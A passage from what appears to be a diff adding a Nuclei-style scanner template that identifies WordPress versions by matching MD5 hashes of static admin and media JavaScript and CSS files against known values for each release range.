"(\"b8177e0d45cb3b1f1f369148b64e9cdb\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"35190a121b43780c0893ed5e92a02d60\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"937d1ec0bf894d9686332fc3f71e6d22\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ce57362b7811e80becfe125cfafc1716\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"f3e951b15db00c5e82cb46f6d941104f\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.4 + dsl: + - "(\"64fd6a9dd5366830074362d07d205018\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"66ff6b408c58c3207ff4b20e75ec5e68\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"e0a1a03f8f8c38df813528fe5bc7f913\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.4 + dsl: + - "(\"3966bc13b65d9487dc6772c615b05cd9\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"21f15ceb6c245e6dc0edc510761049ba\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - "(\"5e93aac0321c9a2b8e95e3826d32ba13\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.5 + dsl: + - "(\"f094cea5fe2b1c870c662ff4794c589f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"de42820ca28cfc889f428dbef29621c3\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"1d52314b1767c557b7232ae192c80318\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"75f2e0d09c07216a86a99c3b6e6772a4\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.33 + dsl: + - "(\"44d281b0d84cc494e2b095a6d2202f4d\" == md5(body))" + - type: dsl + name: 3.7 + dsl: + - "(\"b0bcf8091516db358ee9c833afd73175\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"cf4bbd562430a9bcbe735062be851be1\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"42ce18e88f1c21d4e991fcd431bcb606\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"a58dd12608659503cf087e879e720354\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"55c80a4794624ce9b94aa3631ad46c0b\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"8e529a971610d7ebe7851339c5cb3d67\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"ff19e44be975f89b647274d85b70f821\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"0bdbc699dcd94bbf27740456e0c70ce2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7f8a7473d6a2a2d9816c6688dc4b0df8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a82a5f154aa92773bc69f1eab87fbfd9\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"54783b9eb731afb52deaa7b9363ab737\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"b412f1a6785cc7ef118bf2a9f473b318\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"aaef9189b58df07114fca6a31585aab2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"953c4f11c4e771f648c1fe2d51c597fb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"c57da9f509c04902726f6d3597789c58\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"3c27a95feefe245fc5c8c46427521f09\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"b7af6b7e6c71dab43041eeb21108a8ab\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"a8c67704a82b41a42524d020b12b3b89\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"f789924dd9fbbd262ca2cadfba966702\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ae0291326626c0f608f620ac31dd6c6e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ceb9ed0506ba955acda0e88cef60d26f\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"c191344939b4e7f2ddc2b75796d84e4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/wp-admin.css" + matchers: + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"7f6e4c1e4b7b6d0f6c5a33e63c89b8df\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"f27247eed86da668df2bfda806b64f7c\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"27cd5586d26660072c71e77a2e530496\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"c8890b0c8e534a2a8770b32fd1bca900\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"3fbd461d75443496e1dd6f2b3c9bce0b\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"d8368e8363d075d21a3bb37239c01755\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"32170b63ff23d8bcfc703e7f36c6912b\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"b084bcb3f80a884a197778a347b74b62\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"091a03c35dc57f391703e37367453fec\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6e14567f0e63c4538953578bb95ded3c\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"cd8134a147e7105f539b171536b6fc12\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e2f373fc95a33f5d995be0b7f930d394\" == md5(body))" + - type: dsl + name: 2.0.6 - 2.0.11 + dsl: + - "(\"76015d4b9339d6174aba14ca0283afbe\" == md5(body))" + - type: dsl + name: 2.0.5 + dsl: + - "(\"47479f0fd01b49b2012691cf5a11457e\" == md5(body))" + - type: dsl + name: 2.0.4 + dsl: + - "(\"cf3be0c31abbdd50a0826de6e3066f9a\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"030b95d77a6057ba4813e4a14766067e\" == md5(body))" + - type: dsl + name: 2.0 + dsl: + - "(\"d2d02d4b7b4ec10e3b3fecbf755f9a31\" == md5(body))" + - type: dsl + name: 1.5.1 - 1.5.2 + dsl: + - "(\"c6a1adba93cd3b259a0ae475ab92a028\" == md5(body))" + - type: dsl + name: 1.5-strayhorn + dsl: + - "(\"c8930878ee2f74c02d9f1fa2e8def669\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"c4a70611c37e423cc22892fd58c48ef2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b091ee8973313121b9e38552ef7809b0\" == md5(body))" + - type: dsl + name: 1.2-mingus + dsl: + - "(\"2c67006be8243807b644bdcc37cddb93\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"50206fb9d67a133304d59fd9d6ab3a4f\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"8add712ec32385bae9ab167d993acca0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"f163c1c2c4cdfd95b025798510673c75\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"0683a5bd4a316d854985a3549ec60418\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"71654e9542dd10aa8078f8c005d2cb7e\" == md5(body))" + - type: dsl + name: 4.7.4 + dsl: + - "(\"e48c8805a07665ba778e5d63c9fcd0a1\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"d8598fe25595153923bf25bfb57eb4d7\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"562e8a9067a62789ace0e21a1cb12efd\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"d89eff32867dbead906999d2d33df9dc\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"dcc637122733f05128df061051a6ab93\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"520e79c175d3cde31d6cf1a68ef40e35\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"985654bfee750d913031aeb32ad5d72e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"38dcd3fd1e6f4a9e4503eb6eae7ae92f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"78b299ef2b76ea0769e84138c6c2a6d4\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"6ded237d8837729ba31bb538833c0553\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.10 + dsl: + - "(\"fba25769397927dace7ef2723e86c0a7\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"ee6e58fc6a055440e219557ad66b38aa\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"c48eef3773572618f27809300fae0cde\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.14 + dsl: + - "(\"7c0e981e54ea85d7971d0a9b25a9c263\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"979c54aa2966bbd7cb53e268fe75f3d8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.17 + dsl: + - "(\"ab54b0e9583b36100738905f0d3a531d\" == md5(body))" + - type: dsl + name: 4.1.18 - 4.1.32 + dsl: + - "(\"955c9e88cf52cec1bf7fd7521405dc25\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"edc5f50d0fd73a32d5b06790ffcab513\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.17 + dsl: + - "(\"3362df7d178d660d2108e554428dc01f\" == md5(body))" + - type: dsl + name: 4.0.18 - 4.0.32 + dsl: + - "(\"7a47f3f40fb6d9785cbd14e7b3c37e21\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.18 + dsl: + - "(\"fe12ea464a3c4656f6a37b1627b96089\" == md5(body))" + - type: dsl + name: 3.9.19 - 3.9.33 + dsl: + - "(\"f7929c798aedde2e8aabb3a12a1e7303\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"119ce8b94732f6eb170f8215aa65d47e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"9f2f8d7a1cce39d9f72bbb3928707d23\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.35 + dsl: + - "(\"6c9e4bc36ce6c67a29e4bae09fba936b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - "(\"ab62b63d49366e5face06aa3e1547904\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.35 + dsl: + - "(\"1880f5381359f05ad5c80f9aa2d60f59\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"80552729a4267ab8f23a521424da2d4b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0b77d6826fc7e62e2dba6145d0fc1ba1\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"c637cfded694d52045eb3235a7bf7303\" == md5(body))" + - type: dsl + name: 3.4.1 + dsl: + - "(\"aa0d38bd6f590ad8c3126074145b1bf1\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"b421960bde1ab1e1adfc822336103735\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"6b0f2e81ab83009e7d97de82e0fb679d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"bf3aac7d4a9dce03ec9dd7e993fac22d\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"6ac6b067db2d518fac0045c7195cddd7\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8dad23d14838a3e8600eff1bee809b2d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2e1c867bb53db1bd8c61c325f62779d1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5faaf1990588ef0b12c268e7c0e2262f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9eb22f3a04a29d89c59ed6d84b39410e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60fd86fb779d8562016277fa549883c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"311fefe1942d4341f5e75b322376750f\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"462a161d672f6a44beec251a7aa6c8d8\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"90444dc44a63c22d91d12278c033d4ea\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"30e4449aa544e1648d23ed7c2d1a5423\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dbd27f153db56b47b84856cb1e41d7bb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0b5a51ad30a18d0328f17c2616da58a2\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"a572dd4154d97d362c76879e8e54dd58\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"6cff03191d6f406ced50cfa51737f4b6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"42612bfbee1791a7f347ef3b289f7b4e\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"fb3c19d5e908c23df77247918adbc413\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dc9e2fa5c5e058e9a9466f48322e0f32\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"c9ae6d908e595b6f14b7aa2ad86000d2\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"32fb4510695e27473897cb5251348395\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2830c37f0e53cd900bce37ec46e29ddc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"72c3d94d42bb4c900a1436d17c156e67\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"60a507d4bbba0d8720af1741454c299a\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"1735dc0877bf1b36a76289168dd93b41\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"35767af35006b75866e3a5806ab6496f\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"03eaffeef39119f0523a49c7f9767f3b\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"2637ea6c99869af4bd6e4a49519601a7\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"af42e7400403ae6f09811b24724dc076\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"6cedcf29a7ee4b373ed45b359210b149\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"18b6dcc3aec207acd021ff01f04f9e6c\" == md5(body))" + - type: dsl + name: 3.3.1 - 3.3.3 + dsl: + - "(\"6fa561d1ded6a9c6beec672642f12436\" == md5(body))" + - type: dsl + name: 3.3 + dsl: + - "(\"4516252d47a73630280869994d510180\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"57b1d1d19fdd9511131c71c51401af47\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"df619a8eb3ac90caded086e6415d9413\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d55e645db78f330a6d5e9cefa039e62\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ce3727017cbcf96de2cff9110b42ea94\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2b623d55968742539ffde9ff9416bb29\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"4f0f9bdbe437f850430fae694ca046ba\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"3e3e8da7ed4e97776c76ca0c792d1a85\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7265e623f77644f067b0f40de7a8262a\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"6c175816ac122145e3d941fd3607bacb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"450660797205ec498b60c20e63b31b6f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6925251401e3b9e69ef7950fdb34c6e9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4574fca70d9d122ca8a0505cc17a44e2\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"a189cdd52ffd54cca91d202615612872\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"72027ea41a37cbd5dc9909ed143fed50\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"eba4c4117c3cbc15a6f457b9c1716872\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"8c9d0ff945cc23eb2c0d6ca6f0d344c6\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"32d18988e048936443961fa91f3ae990\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"8a0d38ad2a3ba06c2933629be5497559\" == md5(body))" + - type: dsl + name: 4.7.4 + dsl: + - "(\"c58c70935cb1028d58e6f3fd87c209b0\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"55c9454a7813e7bdf75fe74efa3f5916\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"0e9f7464783db8eec0a3629791448575\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"13ec0e9534db67402cd8e3de6e2ebaeb\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"949fc12a5224b4472f9db582f20f1a77\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"e5063f2033a90df6fcfb3e0c53644da8\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"25c0fd5be25b8e76aa416db9c7219a76\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"14749abf568a231c66bc8d7b086a32ac\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"a3aa2d6d49a4e4b8ab1256c809722cce\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"4fd5dc4a5c6b1c33c27a0275e88d972f\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.10 + dsl: + - "(\"d802579942fc0bf5f30c8f487cc763ff\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"62a3187ffd7165378860d5b028e3d23a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"eeffa28eb1d02c9852c4629192a2ad08\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.14 + dsl: + - "(\"fa9142f8d88f8566d3dd0b40b602ce2e\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"a61c630a083abd9666cf893fe6d047ca\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.17 + dsl: + - "(\"185bb6e6f980917f5b60c2364ed72891\" == md5(body))" + - type: dsl + name: 4.1.18 - 4.1.32 + dsl: + - "(\"eebd05514db4ad8b2f7c01614e40305c\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"0284b64cbc37e3ded9b11133d7bc5fa9\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.17 + dsl: + - "(\"2af7de921aa01a2401792027394b4b86\" == md5(body))" + - type: dsl + name: 4.0.18 - 4.0.32 + dsl: + - "(\"70e9460296f0015550202829a4875756\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.18 + dsl: + - "(\"66dcf489b86a9afa45d327f90f63e651\" == md5(body))" + - type: dsl + name: 3.9.19 - 3.9.33 + dsl: + - "(\"2b51b0bcb5aace306affe367f0e41984\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d735782274ded5e119173b45cbe274f8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"f520723d5ccdcb8e2a5c5d66f40d0e47\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.33 + dsl: + - "(\"bc89d78db3fba05de97e6a6453efb358\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - "(\"fff5ffc0860ce7ad5f84f4c35034fe57\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.33 + dsl: + - "(\"4ade3891406d9308253a53aecd864f2e\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"cf6adf41af1e679b9d888591256c9221\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"776140617bb3df0ecccdaf5a6d881fa3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"ce346a18d9b0d9ea703f53973ea09b06\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"0f62d3fad1802882f09617ec1c093f35\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"b865445e9cb37247e8067d3c321e4ad1\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"834739e5c30c856f39db861e3427285b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"2869deff881c09388d7ed6419df830ee\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a48e911b20edfe9c2f9c52cd9ee6fe5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"80cfa16bc560acb9cbb3bea665ee501e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e7c0d56ef5d72a49f8d4439d31ff4669\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"cfb2d77a0067caf581ef810107666496\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e894f610b3f90d611f17eceba6f34eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d401e7e4d7d0c47d14571dc98e47e171\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-views.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"baa261d498278715c636677425927576\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"9bbd1fa91e81ac80c6e1cd12783681a5\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"b44bc57736b0f9071a8d5b4e1a1c38c0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"6fad095c6f295131844afbfb089956d3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"656fe22a4d1f6c149b387467c0ebda3d\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"973cb2c3a853f2291eed73febceba08c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"c2fbe6eff1344e4b42ac21bfeff6323c\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.19 + dsl: + - "(\"c0eda638d60a8c22407bac9866253eb0\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"999ad3a86de87c0c592571f5cee59fa9\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.20 + dsl: + - "(\"3a7456ca374af47b36df25b8db73a9b6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"1cdc4006b43c0e6434817af8a031bcdb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8c94db3246f7e7de1c2b745fdae79383\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"45d6ae5dec12114dbd9b60fb03c4b510\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"a632e610f46df19fcefa26e4e6e0eab3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"4fbc3282ad968a7874a32e69b2b5f7a8\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6a0e09e778c9d60192c03f0d862ad6ca\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f977730e90672fc7ba27ba83d4e190fd\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"8f9b3fcd0c47b1ba4bf54a1ed2989dd6\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"cd99128430a7e77777d1a80a3010f819\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"03c002070b42e7b16c032fb666774c66\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d6c1665cce65f57593f33c6e94db1c32\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"608a9976d28d43953839ba010fe84e60\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"bd3abdf24209a6355e09603b811c866a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"8a3ff68fbf1fc580d0429d07ee55caf6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8806dd8e94b70370229f76b85c035efd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"24d3a9cd7cfb8c3b95e08bfe61feeed7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"4754c375277eba67871fb5ba44881fba\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"d461e034658d9fd174aa60691a242a1e\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"d27686a16f56b3a120483f46de693218\" == md5(body))" + - type: dsl + name: 4.3.21 - 4.3.25 + dsl: + - "(\"2ae7bb0173079ede4956aebecee60039\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"7eeec89992790dcd6095019d8befdb5d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0fd597b70db817207a401a77250cc1a9\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"98135834eef3a3a00ae7c6e99457110e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e1fe49b6b4e7308fd2eda9c49779c9d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4863f6f7d44547fcfbe2fc609ef03637\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"34ad39cacba1f3dff07a862c378dc401\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-views.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ee966b410333d2346a3c39416a7fc3c4\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"72005ffa5742a50f41246d5917e6e295\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"b1414f1a1df9af09f7f4cf3b86e41967\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"e501be91f82cbda570582d00ce43c054\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b6f5f8a908b5083766141dbb8f10751\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"cfddc53d9255a751bfc5b0d3fd677c49\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"eea98800b824bcf0885b882020a92ae1\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.19 + dsl: + - "(\"6e56654cc6f63fbab2a38db06606b644\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"611a20dba38b0421dc1af45eeaac4acd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.20 + dsl: + - "(\"7c56e29067eccb592238ea9e0650bed4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"8582d4a37ee89cbf90edc967c4af02b6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3c6df510503404b2ac5be6ddba836293\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: 